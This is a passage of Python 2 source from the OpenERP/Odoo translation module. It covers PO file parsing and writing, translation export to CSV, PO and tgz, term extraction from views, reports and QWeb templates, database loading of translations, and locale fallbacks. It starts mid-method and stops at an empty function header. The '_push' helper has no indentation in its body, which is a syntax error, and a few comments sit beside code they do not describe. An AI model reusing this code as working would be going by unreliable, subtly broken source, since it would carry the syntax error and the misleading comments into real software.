                    lang = pool['res.users'].context_get(cr, uid)['lang']
        return lang

    def __call__(self, source):
        """Translate ``source``; on any problem return it unchanged."""
        res = source
        cr = None
        is_new_cr = False
        try:
            frame = inspect.currentframe()
            if frame is None:
                return source
            frame = frame.f_back
            if not frame:
                return source
            lang = self._get_lang(frame)
            if lang:
                cr, is_new_cr = self._get_cr(frame)
                if cr:
                    # Try to use ir.translation to benefit from global cache if possible
                    registry = openerp.registry(cr.dbname)
                    res = registry['ir.translation']._get_source(cr, SUPERUSER_ID, None, ('code','sql_constraint'), lang, source)
                else:
                    _logger.debug('no context cursor detected, skipping translation for "%r"', source)
            else:
                _logger.debug('no translation language detected, skipping translation for "%r" ', source)
        except Exception:
            # deliberately swallow everything: translation must never break the caller
            _logger.debug('translation went wrong for "%r", skipped', source)
            # if so, double-check the root/base translations filenames
        finally:
            if cr and is_new_cr:
                cr.close()
        return res

# module-level singleton used throughout the codebase as the gettext alias
_ = GettextAlias()
def quote(s):
    """Return *s* as a double-quoted PO term with special characters escaped."""
    assert r"\n" not in s, "Translation terms may not include escaped newlines ('\\n'), please use only literal newlines! (in '%s')" % s
    escaped = s.replace('\\', '\\\\')
    escaped = escaped.replace('"', '\\"')
    # a literal newline becomes \n, then the term continues on the next line
    escaped = escaped.replace('\n', '\\n"\n"')
    return '"%s"' % escaped
re_escaped_char = re.compile(r"(\\.)")
re_escaped_replacements = {'n': '\n', }

def _sub_replacement(match_obj):
    """Map one escaped PO sequence (e.g. ``\\n``) to its literal character."""
    escaped = match_obj.group(1)[1]
    return re_escaped_replacements.get(escaped, escaped)

def unquote(str):
    """Returns unquoted PO term string, with special PO characters unescaped"""
    inner = str[1:-1]  # drop the surrounding double quotes
    return re_escaped_char.sub(_sub_replacement, inner)
# class to handle po files
class TinyPoFile(object):
    """Minimal reader/writer for gettext PO files.

    Reading: iterate the instance; each iteration yields a tuple
    ``(type, name, res_id, source, translation, comments)``. A single PO
    entry with several ``#:`` reference targets yields one tuple per target
    (extra targets are buffered in ``self.extra_lines``).

    Writing: call write_infos() once for the header, then write() per term.
    Python 2 iterator protocol only (``next``, no ``__next__``).
    """

    def __init__(self, buffer):
        # buffer: a file-like object, readable and/or writable
        self.buffer = buffer

    def warn(self, msg, *args):
        _logger.warning(msg, *args)

    def __iter__(self):
        # (re)start parsing from the beginning of the buffer
        self.buffer.seek(0)
        self.lines = self._get_lines()
        self.lines_count = len(self.lines)
        self.first = True
        self.extra_lines= []
        return self

    def _get_lines(self):
        lines = self.buffer.readlines()
        # remove the BOM (Byte Order Mark):
        if len(lines):
            lines[0] = unicode(lines[0], 'utf8').lstrip(unicode( codecs.BOM_UTF8, "utf8"))
        lines.append('') # ensure that the file ends with at least an empty line
        return lines

    def cur_line(self):
        # 1-based-ish position: number of lines already consumed
        return self.lines_count - len(self.lines)

    def next(self):
        """Return the next ``(type, name, res_id, source, trad, comments)``."""
        trans_type = name = res_id = source = trad = None
        if self.extra_lines:
            # remaining targets of the previously parsed PO entry
            trans_type, name, res_id, source, trad, comments = self.extra_lines.pop(0)
            if not res_id:
                res_id = '0'
        else:
            comments = []
            targets = []
            line = None
            fuzzy = False
            # skip any blank lines before the entry
            while not line:
                if 0 == len(self.lines):
                    raise StopIteration()
                line = self.lines.pop(0).strip()
            while line.startswith('#'):
                if line.startswith('#~ '):
                    break
                if line.startswith('#.'):
                    line = line[2:].strip()
                    if not line.startswith('module:'):
                        comments.append(line)
                elif line.startswith('#:'):
                    # Process the `reference` comments. Each line can specify
                    # multiple targets (e.g. model, view, code, selection,
                    # ...). For each target, we will return an additional
                    # entry.
                    for lpart in line[2:].strip().split(' '):
                        trans_info = lpart.strip().split(':',2)
                        if trans_info and len(trans_info) == 2:
                            # looks like the translation trans_type is missing, which is not
                            # unexpected because it is not a GetText standard. Default: 'code'
                            trans_info[:0] = ['code']
                        if trans_info and len(trans_info) == 3:
                            # this is a ref line holding the destination info (model, field, record)
                            targets.append(trans_info)
                elif line.startswith('#,') and (line[2:].strip() == 'fuzzy'):
                    fuzzy = True
                line = self.lines.pop(0).strip()
            if not self.lines:
                raise StopIteration()
            while not line:
                # allow empty lines between comments and msgid
                line = self.lines.pop(0).strip()
            if line.startswith('#~ '):
                while line.startswith('#~ ') or not line.strip():
                    if 0 == len(self.lines):
                        raise StopIteration()
                    line = self.lines.pop(0)
                # This has been a deprecated entry, don't return anything
                return self.next()
            if not line.startswith('msgid'):
                raise Exception("malformed file: bad line: %s" % line)
            source = unquote(line[6:])
            line = self.lines.pop(0).strip()
            if not source and self.first:
                self.first = False
                # if the source is "" and it's the first msgid, it's the special
                # msgstr with the informations about the traduction and the
                # traductor; we skip it
                self.extra_lines = []
                while line:
                    line = self.lines.pop(0).strip()
                return self.next()
            # msgid may span several quoted lines
            while not line.startswith('msgstr'):
                if not line:
                    raise Exception('malformed file at %d'% self.cur_line())
                source += unquote(line)
                line = self.lines.pop(0).strip()
            trad = unquote(line[7:])
            line = self.lines.pop(0).strip()
            # msgstr may span several quoted lines as well
            while line:
                trad += unquote(line)
                line = self.lines.pop(0).strip()
            if targets and not fuzzy:
                # Use the first target for the current entry (returned at the
                # end of this next() call), and keep the others to generate
                # additional entries (returned the next next() calls).
                trans_type, name, res_id = targets.pop(0)
                for t, n, r in targets:
                    if t == trans_type == 'code': continue
                    self.extra_lines.append((t, n, r, source, trad, comments))
        if name is None:
            if not fuzzy:
                self.warn('Missing "#:" formated comment at line %d for the following source:\n\t%s',
                          self.cur_line(), source[:30])
            return self.next()
        return trans_type, name, res_id, source, trad, '\n'.join(comments)

    def write_infos(self, modules):
        """Write the standard PO header listing the exported ``modules``."""
        import openerp.release as release
        self.buffer.write("# Translation of %(project)s.\n" \
                          "# This file contains the translation of the following modules:\n" \
                          "%(modules)s" \
                          "#\n" \
                          "msgid \"\"\n" \
                          "msgstr \"\"\n" \
                          '''"Project-Id-Version: %(project)s %(version)s\\n"\n''' \
                          '''"Report-Msgid-Bugs-To: \\n"\n''' \
                          '''"POT-Creation-Date: %(now)s\\n"\n''' \
                          '''"PO-Revision-Date: %(now)s\\n"\n''' \
                          '''"Last-Translator: <>\\n"\n''' \
                          '''"Language-Team: \\n"\n''' \
                          '''"MIME-Version: 1.0\\n"\n''' \
                          '''"Content-Type: text/plain; charset=UTF-8\\n"\n''' \
                          '''"Content-Transfer-Encoding: \\n"\n''' \
                          '''"Plural-Forms: \\n"\n''' \
                          "\n"
                          % { 'project': release.description,
                              'version': release.version,
                              'modules': reduce(lambda s, m: s + "#\t* %s\n" % m, modules, ""),
                              'now': datetime.utcnow().strftime('%Y-%m-%d %H:%M')+"+0000",
                            }
                          )

    def write(self, modules, tnrs, source, trad, comments=None):
        """Write one PO entry: module/comment headers, references, msgid/msgstr."""
        plurial = len(modules) > 1 and 's' or ''
        self.buffer.write("#. module%s: %s\n" % (plurial, ', '.join(modules)))
        if comments:
            self.buffer.write(''.join(('#. %s\n' % c for c in comments)))
        code = False
        for typy, name, res_id in tnrs:
            self.buffer.write("#: %s:%s:%s\n" % (typy, name, res_id))
            if typy == 'code':
                code = True
        if code:
            # only strings in python code are python formated
            self.buffer.write("#, python-format\n")
        if not isinstance(trad, unicode):
            trad = unicode(trad, 'utf8')
        if not isinstance(source, unicode):
            source = unicode(source, 'utf8')
        msg = "msgid %s\n" \
              "msgstr %s\n\n" \
              % (quote(source), quote(trad))
        self.buffer.write(msg.encode('utf8'))
# Methods to export the translation file
def trans_export(lang, modules, buffer, format, cr):
    """Export the translations of ``modules`` into ``buffer``.

    :param lang: language code to export, or falsy for a translation
                 template (all values empty)
    :param modules: list of module names, or ['all'] for every module
    :param buffer: writable (binary) file-like object receiving the output
    :param format: one of 'csv', 'po' or 'tgz'
    :param cr: database cursor used to collect the terms
    :raise Exception: when ``format`` is not one of the supported values
    """
    def _process(format, modules, rows, buffer, lang):
        if format == 'csv':
            writer = csv.writer(buffer, 'UNIX')
            # write header first
            writer.writerow(("module","type","name","res_id","src","value"))
            for module, type, name, res_id, src, trad, comments in rows:
                # Comments are ignored by the CSV writer
                writer.writerow((module, type, name, res_id, src, trad))
        elif format == 'po':
            writer = TinyPoFile(buffer)
            writer.write_infos(modules)
            # we now group the translations by source. That means one translation per source.
            grouped_rows = {}
            for module, type, name, res_id, src, trad, comments in rows:
                row = grouped_rows.setdefault(src, {})
                row.setdefault('modules', set()).add(module)
                if not row.get('translation') and trad != src:
                    row['translation'] = trad
                row.setdefault('tnrs', []).append((type, name, res_id))
                row.setdefault('comments', set()).update(comments)
            for src, row in sorted(grouped_rows.items()):
                if not lang:
                    # translation template, so no translation value
                    row['translation'] = ''
                elif not row.get('translation'):
                    row['translation'] = src
                writer.write(row['modules'], row['tnrs'], src, row['translation'], row['comments'])
        elif format == 'tgz':
            import shutil  # local import, consistent with write_infos() style
            rows_by_module = {}
            for row in rows:
                module = row[0]
                rows_by_module.setdefault(module, []).append(row)
            tmpdir = tempfile.mkdtemp()
            try:
                for mod, modrows in rows_by_module.items():
                    tmpmoddir = join(tmpdir, mod, 'i18n')
                    os.makedirs(tmpmoddir)
                    # lang.po for translations, module.pot for templates
                    pofilename = (lang if lang else mod) + ".po" + ('t' if not lang else '')
                    buf = open(join(tmpmoddir, pofilename), 'w')
                    try:
                        _process('po', [mod], modrows, buf, lang)
                    finally:
                        buf.close()
                tar = tarfile.open(fileobj=buffer, mode='w|gz')
                tar.add(tmpdir, '')
                tar.close()
            finally:
                # the scratch directory is only needed while building the archive;
                # previously it was leaked on every export
                shutil.rmtree(tmpdir, ignore_errors=True)
        else:
            # translate the bare message first, then substitute the extension,
            # so the source term can actually match an ir.translation entry
            raise Exception(_('Unrecognized extension: must be one of '
                '.csv, .po, or .tgz (received .%s).') % format)

    translations = trans_generate(lang, modules, cr)
    modules = set(t[0] for t in translations)
    _process(format, modules, translations, buffer, lang)
    del translations
def trans_parse_xsl(de):
    """Return the unique translatable terms found in the XSL etree ``de``."""
    return list(set(trans_parse_xsl_aux(de, False)))
def trans_parse_xsl_aux(de, t):
    """Recursive helper for trans_parse_xsl.

    :param de: etree element whose children are scanned
    :param t: truthy when an ancestor carried a "t" attribute
    :return: list of utf8-encoded terms (duplicates possible)
    """
    res = []
    for n in de:
        # NOTE(review): ``t`` is rebound inside the loop, so once one sibling
        # sets it, all *following* siblings inherit it too -- confirm this
        # propagation is intended and not a latent bug.
        t = t or n.get("t")
        if t:
            # skip comments/PIs and XSL-namespace elements
            if isinstance(n, SKIPPED_ELEMENT_TYPES) or n.tag.startswith('{http://www.w3.org/1999/XSL/Transform}'):
                continue
            if n.text:
                l = n.text.strip().replace('\n',' ')
                if len(l):
                    res.append(l.encode("utf8"))
            if n.tail:
                l = n.tail.strip().replace('\n',' ')
                if len(l):
                    res.append(l.encode("utf8"))
        res.extend(trans_parse_xsl_aux(n, t))
    return res
def trans_parse_rml(de):
    """Recursively collect translatable strings from an RML etree.

    ``[[ ... ]]`` expressions are treated as separators and dropped; the
    remaining text fragments are stripped and returned utf8-encoded.
    """
    res = []
    for node in de:
        for child in node:
            if isinstance(child, SKIPPED_ELEMENT_TYPES) or not child.text:
                continue
            for segment in re.split('\[\[.+?\]\]', child.text):
                cleaned = segment.replace('\n', ' ').strip()
                if cleaned:
                    res.append(cleaned.encode("utf8"))
        res.extend(trans_parse_rml(node))
    return res
def _push(callback, term, source_line):
""" Sanity check before pushing translation terms """
term = (term or "").strip().encode('utf8')
# Avoid non-char tokens like ':' '...' '.00' etc.
if len(term) > 8 or any(x.isalpha() for x in term):
callback(term, source_line)
def trans_parse_view(element, callback):
    """Walk a regular view etree and report each translatable term.

    :param element: root of the etree document to extract terms from
    :param callback: callable ``f(term, source_line)`` invoked per term
    """
    for el in element.iter():
        # element text is translatable only for non-skipped, non-disabled nodes
        # (short-circuit keeps comment/PI nodes from being asked for a tag)
        text_translatable = (not isinstance(el, SKIPPED_ELEMENT_TYPES)
                             and el.tag.lower() not in SKIPPED_ELEMENTS
                             and el.get("translation", '').strip() != "off")
        if text_translatable and el.text:
            _push(callback, el.text, el.sourceline)
        # tail text and label-like attributes are extracted for every element,
        # even those whose own text was skipped above
        if el.tail:
            _push(callback, el.tail, el.sourceline)
        for attr in ('string', 'help', 'sum', 'confirm', 'placeholder'):
            value = el.get(attr)
            if value:
                _push(callback, value, el.sourceline)
# tests whether an object is in a list of modules
def in_modules(object_name, modules):
    """Return True when ``object_name``'s module prefix is in ``modules``.

    'all' in ``modules`` matches everything; the 'ir', 'res' and 'workflow'
    prefixes all belong to the 'base' module.
    """
    if 'all' in modules:
        return True
    aliases = {
        'ir': 'base',
        'res': 'base',
        'workflow': 'base',
    }
    prefix = object_name.split('.')[0]
    return aliases.get(prefix, prefix) in modules
def _extract_translatable_qweb_terms(element, callback):
    """Walk a QWeb template etree and report each translatable term.

    Elements marked with ``t-js``, unanchored ``t-jquery`` manipulations, or
    ``t-translation="off"`` are skipped together with their whole subtree.

    :param element: etree element whose children are scanned
    :param callback: callable ``f(term, source_line)`` invoked per term
    """
    # not using elementTree.iterparse because we need to skip sub-trees in case
    # the ancestor element had a reason to be skipped
    for el in element:
        if isinstance(el, SKIPPED_ELEMENT_TYPES): continue
        if (el.tag.lower() not in SKIPPED_ELEMENTS
                and "t-js" not in el.attrib
                and not ("t-jquery" in el.attrib and "t-operation" not in el.attrib)
                and el.get("t-translation", '').strip() != "off"):
            _push(callback, el.text, el.sourceline)
            for att in ('title', 'alt', 'label', 'placeholder'):
                if att in el.attrib:
                    _push(callback, el.attrib[att], el.sourceline)
            _extract_translatable_qweb_terms(el, callback)
        # tail text belongs to the parent, so it is pushed even for skipped nodes
        _push(callback, el.tail, el.sourceline)
def babel_extract_qweb(fileobj, keywords, comment_tags, options):
    """Babel message extractor for qweb template files.

    :param fileobj: the file-like object the messages should be extracted from
    :param keywords: list of keywords (function names) recognized as
                     translation functions (unused here)
    :param comment_tags: list of translator tags to search for (unused here)
    :param options: dictionary of additional options (optional)
    :return: iterable of ``(lineno, funcname, message, comments)`` tuples
    :rtype: Iterable
    """
    messages = []
    tree = etree.parse(fileobj)
    _extract_translatable_qweb_terms(
        tree.getroot(),
        lambda text, lineno: messages.append((lineno, None, text, [])))
    return messages
def trans_generate(lang, modules, cr):
    """Collect every translatable term of ``modules`` from database and files.

    Terms come from ir.model.data records (views, fields, reports, translated
    model columns), model constraints, and the module source files scanned
    with babel (.py, .mako, static js/xml).

    :param lang: language to pre-fill translations for, or falsy for a template
    :param modules: module names, or ['all'] / ['all_installed'] wildcards
    :param cr: database cursor
    :return: sorted list of (module, type, name, res_id, source, value, comments)
    """
    dbname = cr.dbname

    registry = openerp.registry(dbname)
    trans_obj = registry['ir.translation']
    model_data_obj = registry['ir.model.data']
    uid = 1

    query = 'SELECT name, model, res_id, module' \
        ' FROM ir_model_data'

    query_models = """SELECT m.id, m.model, imd.module
            FROM ir_model AS m, ir_model_data AS imd
            WHERE m.id = imd.res_id AND imd.model = 'ir.model' """

    # NOTE(review): passing 'all_installed' *without* 'all' appends two WHERE
    # clauses to ``query`` -- confirm the expected call pattern.
    if 'all_installed' in modules:
        query += ' WHERE module IN ( SELECT name FROM ir_module_module WHERE state = \'installed\') '
        query_models += " AND imd.module in ( SELECT name FROM ir_module_module WHERE state = 'installed') "
    query_param = None
    if 'all' not in modules:
        query += ' WHERE module IN %s'
        query_models += ' AND imd.module in %s'
        query_param = (tuple(modules),)
    query += ' ORDER BY module, model, name'
    query_models += ' ORDER BY module, model'

    cr.execute(query, query_param)

    # set of (module, source, name, res_id, type, comments) tuples
    _to_translate = set()
    def push_translation(module, type, name, id, source, comments=None):
        # empty and one-letter terms are ignored, they probably are not meant to be
        # translated, and would be very hard to translate anyway.
        if not source or len(source.strip()) <= 1:
            return
        tnx = (module, source, name, id, type, tuple(comments or ()))
        _to_translate.add(tnx)

    def encode(s):
        # utf8-encode unicode values; leave str untouched (python 2 semantics)
        if isinstance(s, unicode):
            return s.encode('utf8')
        return s

    def push(mod, type, name, res_id, term):
        # filter trivial terms before queueing (small english words excepted)
        term = (term or '').strip()
        if len(term) > 2 or term in ENGLISH_SMALL_WORDS:
            push_translation(mod, type, name, res_id, term)

    def get_root_view(xml_id):
        # climb the inheritance chain so qweb terms attach to the primary view
        view = model_data_obj.xmlid_to_object(cr, uid, xml_id)
        if view:
            while view.mode != 'primary':
                view = view.inherit_id
        xml_id = view.get_external_id(cr, uid).get(view.id, xml_id)
        return xml_id

    for (xml_name,model,res_id,module) in cr.fetchall():
        module = encode(module)
        model = encode(model)
        xml_name = "%s.%s" % (module, encode(xml_name))

        if model not in registry:
            _logger.error("Unable to find object %r", model)
            continue

        Model = registry[model]
        if not Model._translate:
            # explicitly disabled
            continue

        obj = Model.browse(cr, uid, res_id)
        if not obj.exists():
            _logger.warning("Unable to find object %r with id %d", model, res_id)
            continue

        if model=='ir.ui.view':
            d = etree.XML(encode(obj.arch))
            if obj.type == 'qweb':
                view_id = get_root_view(xml_name)
                push_qweb = lambda t,l: push(module, 'view', 'website', view_id, t)
                _extract_translatable_qweb_terms(d, push_qweb)
            else:
                push_view = lambda t,l: push(module, 'view', obj.model, xml_name, t)
                trans_parse_view(d, push_view)
        elif model=='ir.actions.wizard':
            pass # TODO Can model really be 'ir.actions.wizard' ?

        elif model=='ir.model.fields':
            try:
                field_name = encode(obj.name)
            except AttributeError, exc:
                _logger.error("name error in %s: %s", xml_name, str(exc))
                continue
            objmodel = registry.get(obj.model)
            if (objmodel is None or field_name not in objmodel._columns
                    or not objmodel._translate):
                continue
            field_def = objmodel._columns[field_name]

            name = "%s,%s" % (encode(obj.model), field_name)
            push_translation(module, 'field', name, 0, encode(field_def.string))

            if field_def.help:
                push_translation(module, 'help', name, 0, encode(field_def.help))

            if field_def.translate:
                ids = objmodel.search(cr, uid, [])
                obj_values = objmodel.read(cr, uid, ids, [field_name])
                for obj_value in obj_values:
                    res_id = obj_value['id']
                    if obj.name in ('ir.model', 'ir.ui.menu'):
                        res_id = 0
                    model_data_ids = model_data_obj.search(cr, uid, [
                        ('model', '=', model),
                        ('res_id', '=', res_id),
                        ])
                    if not model_data_ids:
                        # records without an xml id get a plain 'model' term
                        push_translation(module, 'model', name, 0, encode(obj_value[field_name]))

            if hasattr(field_def, 'selection') and isinstance(field_def.selection, (list, tuple)):
                for dummy, val in field_def.selection:
                    push_translation(module, 'selection', name, 0, encode(val))

        elif model=='ir.actions.report.xml':
            name = encode(obj.report_name)
            fname = ""
            if obj.report_rml:
                fname = obj.report_rml
                parse_func = trans_parse_rml
                report_type = "report"
            elif obj.report_xsl:
                fname = obj.report_xsl
                parse_func = trans_parse_xsl
                report_type = "xsl"
            if fname and obj.report_type in ('pdf', 'xsl'):
                try:
                    report_file = misc.file_open(fname)
                    try:
                        d = etree.parse(report_file)
                        for t in parse_func(d.iter()):
                            push_translation(module, report_type, name, 0, t)
                    finally:
                        report_file.close()
                except (IOError, etree.XMLSyntaxError):
                    _logger.exception("couldn't export translation for report %s %s %s", name, report_type, fname)

        # translated columns of the record itself, whatever its model
        for field_name, field_def in obj._columns.items():
            if model == 'ir.model' and field_name == 'name' and obj.name == obj.model:
                # ignore model name if it is the technical one, nothing to translate
                continue
            if field_def.translate:
                name = model + "," + field_name
                try:
                    term = obj[field_name] or ''
                except:
                    term = ''
                push_translation(module, 'model', name, xml_name, encode(term))

        # End of data for ir.model.data query results

    cr.execute(query_models, query_param)

    def push_constraint_msg(module, term_type, model, msg):
        # callable constraint messages are computed at runtime, skip them
        if not hasattr(msg, '__call__'):
            push_translation(encode(module), term_type, encode(model), 0, encode(msg))

    def push_local_constraints(module, model, cons_type='sql_constraints'):
        """Climb up the class hierarchy and ignore inherited constraints
        from other modules"""
        term_type = 'sql_constraint' if cons_type == 'sql_constraints' else 'constraint'
        msg_pos = 2 if cons_type == 'sql_constraints' else 1
        for cls in model.__class__.__mro__:
            if getattr(cls, '_module', None) != module:
                continue
            constraints = getattr(cls, '_local_' + cons_type, [])
            for constraint in constraints:
                push_constraint_msg(module, term_type, model._name, constraint[msg_pos])

    for (_, model, module) in cr.fetchall():
        if model not in registry:
            _logger.error("Unable to find object %r", model)
            continue

        model_obj = registry[model]

        if model_obj._constraints:
            push_local_constraints(module, model_obj, 'constraints')

        if model_obj._sql_constraints:
            push_local_constraints(module, model_obj, 'sql_constraints')

    installed_modules = map(
        lambda m: m['name'],
        registry['ir.module.module'].search_read(cr, uid, [('state', '=', 'installed')], fields=['name']))

    path_list = [(path, True) for path in openerp.modules.module.ad_paths]
    # Also scan these non-addon paths
    for bin_path in ['osv', 'report', 'modules', 'service', 'tools']:
        path_list.append((os.path.join(config.config['root_path'], bin_path), True))
    # non-recursive scan for individual files in root directory but without
    # scanning subdirectories that may contain addons
    path_list.append((config.config['root_path'], False))
    _logger.debug("Scanning modules at paths: %s", path_list)

    def get_module_from_path(path):
        for (mp, rec) in path_list:
            if rec and path.startswith(mp) and os.path.dirname(path) != mp:
                path = path[len(mp)+1:]
                return path.split(os.path.sep)[0]
        return 'base' # files that are not in a module are considered as being in 'base' module

    def verified_module_filepaths(fname, path, root):
        # return module info only for files of modules we are exporting
        fabsolutepath = join(root, fname)
        frelativepath = fabsolutepath[len(path):]
        display_path = "addons%s" % frelativepath
        module = get_module_from_path(fabsolutepath)
        if ('all' in modules or module in modules) and module in installed_modules:
            if os.path.sep != '/':
                display_path = display_path.replace(os.path.sep, '/')
            return module, fabsolutepath, frelativepath, display_path
        return None, None, None, None

    # NOTE(review): mutable default ``extract_keywords`` is shared between
    # calls; harmless here because it is never mutated.
    def babel_extract_terms(fname, path, root, extract_method="python", trans_type='code',
                            extra_comments=None, extract_keywords={'_': None}):
        module, fabsolutepath, _, display_path = verified_module_filepaths(fname, path, root)
        extra_comments = extra_comments or []
        if not module: return
        src_file = open(fabsolutepath, 'r')
        try:
            for extracted in extract.extract(extract_method, src_file,
                                             keywords=extract_keywords):
                # Babel 0.9.6 yields lineno, message, comments
                # Babel 1.3 yields lineno, message, comments, context
                lineno, message, comments = extracted[:3]
                push_translation(module, trans_type, display_path, lineno,
                                 encode(message), comments + extra_comments)
        except Exception:
            _logger.exception("Failed to extract terms from %s", fabsolutepath)
        finally:
            src_file.close()

    for (path, recursive) in path_list:
        _logger.debug("Scanning files of modules at %s", path)
        for root, dummy, files in osutil.walksymlinks(path):
            for fname in fnmatch.filter(files, '*.py'):
                babel_extract_terms(fname, path, root)
            # mako provides a babel extractor: http://docs.makotemplates.org/en/latest/usage.html#babel
            for fname in fnmatch.filter(files, '*.mako'):
                babel_extract_terms(fname, path, root, 'mako', trans_type='report')
            # Javascript source files in the static/src/js directory, rest is ignored (libs)
            if fnmatch.fnmatch(root, '*/static/src/js*'):
                for fname in fnmatch.filter(files, '*.js'):
                    babel_extract_terms(fname, path, root, 'javascript',
                                        extra_comments=[WEB_TRANSLATION_COMMENT],
                                        extract_keywords={'_t': None, '_lt': None})
            # QWeb template files
            if fnmatch.fnmatch(root, '*/static/src/xml*'):
                for fname in fnmatch.filter(files, '*.xml'):
                    babel_extract_terms(fname, path, root, 'openerp.tools.translate:babel_extract_qweb',
                                        extra_comments=[WEB_TRANSLATION_COMMENT])
            if not recursive:
                # due to topdown, first iteration is in first level
                break

    out = []
    # translate strings marked as to be translated
    for module, source, name, id, type, comments in sorted(_to_translate):
        trans = '' if not lang else trans_obj._get_source(cr, uid, name, type, lang, source)
        out.append((module, type, name, id, source, encode(trans) or '', comments))
    return out
def trans_load(cr, filename, lang, verbose=True, module_name=None, context=None):
    """Load the translation file ``filename`` into the database.

    :return: the result of trans_load_data(), or None when the file cannot
             be read (logged as an error unless ``verbose`` is False)
    """
    fileobj = None
    try:
        fileobj = misc.file_open(filename)
        _logger.info("loading %s", filename)
        # the extension (without the dot) selects the parser: 'po' or 'csv'
        fileformat = os.path.splitext(filename)[-1][1:].lower()
        return trans_load_data(cr, fileobj, fileformat, lang, verbose=verbose, module_name=module_name, context=context)
    except IOError:
        if verbose:
            _logger.error("couldn't read translation file %s", filename)
        return None
    finally:
        # previously the handle leaked whenever trans_load_data() raised;
        # always release it here
        if fileobj is not None:
            fileobj.close()
def trans_load_data(cr, fileobj, fileformat, lang, lang_name=None, verbose=True, module_name=None, context=None):
    """Populates the ir_translation table.

    :param cr: database cursor
    :param fileobj: open file-like object holding the translations
    :param fileformat: 'po' or 'csv'
    :param lang: language code the terms are loaded for (created if missing)
    :param lang_name: display name used when the language must be created
    :param module_name: module the terms belong to (used for plain PO rows)
    """
    if verbose:
        _logger.info('loading translation file for language %s', lang)
    if context is None:
        context = {}
    db_name = cr.dbname
    registry = openerp.registry(db_name)
    lang_obj = registry.get('res.lang')
    trans_obj = registry.get('ir.translation')
    iso_lang = misc.get_iso_codes(lang)
    try:
        ids = lang_obj.search(cr, SUPERUSER_ID, [('code','=', lang)])

        if not ids:
            # lets create the language with locale information
            lang_obj.load_lang(cr, SUPERUSER_ID, lang=lang, lang_name=lang_name)

        # Parse also the POT: it will possibly provide additional targets.
        # (Because the POT comments are correct on Launchpad but not the
        # PO comments due to a Launchpad limitation. See LP bug 933496.)
        pot_reader = []

        # now, the serious things: we read the language file
        fileobj.seek(0)
        if fileformat == 'csv':
            reader = csv.reader(fileobj, quotechar='"', delimiter=',')
            # read the first line of the file (it contains columns titles)
            for row in reader:
                fields = row
                break
        elif fileformat == 'po':
            reader = TinyPoFile(fileobj)
            fields = ['type', 'name', 'res_id', 'src', 'value', 'comments']

            # Make a reader for the POT file and be somewhat defensive for the
            # stable branch.
            if fileobj.name.endswith('.po'):
                try:
                    # Normally the path looks like /path/to/xxx/i18n/lang.po
                    # and we try to find the corresponding
                    # /path/to/xxx/i18n/xxx.pot file.
                    # (Sometimes we have 'i18n_extra' instead of just 'i18n')
                    addons_module_i18n, _ = os.path.split(fileobj.name)
                    addons_module, i18n_dir = os.path.split(addons_module_i18n)
                    addons, module = os.path.split(addons_module)
                    pot_handle = misc.file_open(os.path.join(
                        addons, module, i18n_dir, module + '.pot'))
                    pot_reader = TinyPoFile(pot_handle)
                except:
                    # best-effort only: a missing POT simply disables the merge
                    pass

        else:
            _logger.error('Bad file format: %s', fileformat)
            raise Exception(_('Bad file format'))

        # Read the POT references, and keep them indexed by source string.
        class Target(object):
            def __init__(self):
                self.value = None
                self.targets = set()            # set of (type, name, res_id)
                self.comments = None

        pot_targets = defaultdict(Target)
        for type, name, res_id, src, _, comments in pot_reader:
            if type is not None:
                target = pot_targets[src]
                target.targets.add((type, name, res_id))
                target.comments = comments

        # read the rest of the file
        irt_cursor = trans_obj._get_import_cursor(cr, SUPERUSER_ID, context=context)

        def process_row(row):
            """Process a single PO (or POT) entry."""
            # dictionary which holds values for this line of the csv file
            # {'lang': ..., 'type': ..., 'name': ..., 'res_id': ...,
            #  'src': ..., 'value': ..., 'module':...}
            dic = dict.fromkeys(('type', 'name', 'res_id', 'src', 'value',
                                 'comments', 'imd_model', 'imd_name', 'module'))
            dic['lang'] = lang
            dic.update(zip(fields, row))

            # discard the target from the POT targets.
            src = dic['src']
            if src in pot_targets:
                target = pot_targets[src]
                target.value = dic['value']
                target.targets.discard((dic['type'], dic['name'], dic['res_id']))

            # This would skip terms that fail to specify a res_id
            res_id = dic['res_id']
            if not res_id:
                return

            if isinstance(res_id, (int, long)) or \
                    (isinstance(res_id, basestring) and res_id.isdigit()):
                dic['res_id'] = int(res_id)
                dic['module'] = module_name
            else:
                # res_id is an xml id
                dic['res_id'] = None
                dic['imd_model'] = dic['name'].split(',')[0]
                if '.' in res_id:
                    dic['module'], dic['imd_name'] = res_id.split('.', 1)
                else:
                    dic['module'], dic['imd_name'] = False, res_id

            irt_cursor.push(dic)

        # First process the entries from the PO file (doing so also fills/removes
        # the entries from the POT file).
        for row in reader:
            process_row(row)

        # Then process the entries implied by the POT file (which is more
        # correct w.r.t. the targets) if some of them remain.
        pot_rows = []
        for src, target in pot_targets.iteritems():
            if target.value:
                for type, name, res_id in target.targets:
                    pot_rows.append((type, name, res_id, src, target.value, target.comments))
        pot_targets.clear()
        for row in pot_rows:
            process_row(row)

        irt_cursor.finish()
        trans_obj.clear_caches()
        if verbose:
            _logger.info("translation file loaded succesfully")

    except IOError:
        filename = '[lang: %s][format: %s]' % (iso_lang or 'new', fileformat)
        _logger.exception("couldn't read translation file %s", filename)
def get_locales(lang=None):
    """Yield candidate locale names for ``lang``, most specific first.

    Candidates are tried with a UTF-8 encoding suffix, then with the
    platform's preferred encoding (plus a few well-known aliases of it),
    and finally the bare language code itself.  On Windows the language
    code is first mapped through ``_LOCALE2WIN32``.
    """
    if lang is None:
        lang = locale.getdefaultlocale()[0]
    if os.name == 'nt':
        lang = _LOCALE2WIN32.get(lang, lang)

    def candidates(encoding):
        # Build "<lang>.<encoding>" and also its normalized spelling when
        # normalization produces a different name.
        name = locale._build_localename((lang, encoding))
        yield name
        normalized = locale.normalize(name)
        if normalized != name:
            yield normalized

    for candidate in candidates('utf8'):
        yield candidate
    preferred = locale.getpreferredencoding()
    if preferred:
        for candidate in candidates(preferred):
            yield candidate
        # Common alias spellings of the preferred encoding.
        alias = {
            'latin1': 'latin9',
            'iso-8859-1': 'iso8859-15',
            'cp1252': '1252',
        }.get(preferred.lower())
        if alias:
            for candidate in candidates(alias):
                yield candidate
    # Last resort: the plain language code without any encoding suffix.
    yield lang
def resetlocale():
    """Set LC_ALL to the first candidate locale that the C library accepts.

    ``locale.resetlocale`` is bugged with some locales, hence this manual
    fallback over the candidates produced by :func:`get_locales`.  Returns
    the locale string actually set, or ``None`` if every candidate failed.
    """
    for name in get_locales():
        try:
            return locale.setlocale(locale.LC_ALL, name)
        except locale.Error:
            # Candidate not supported on this system -- try the next one.
            pass
def load_language(cr, lang):
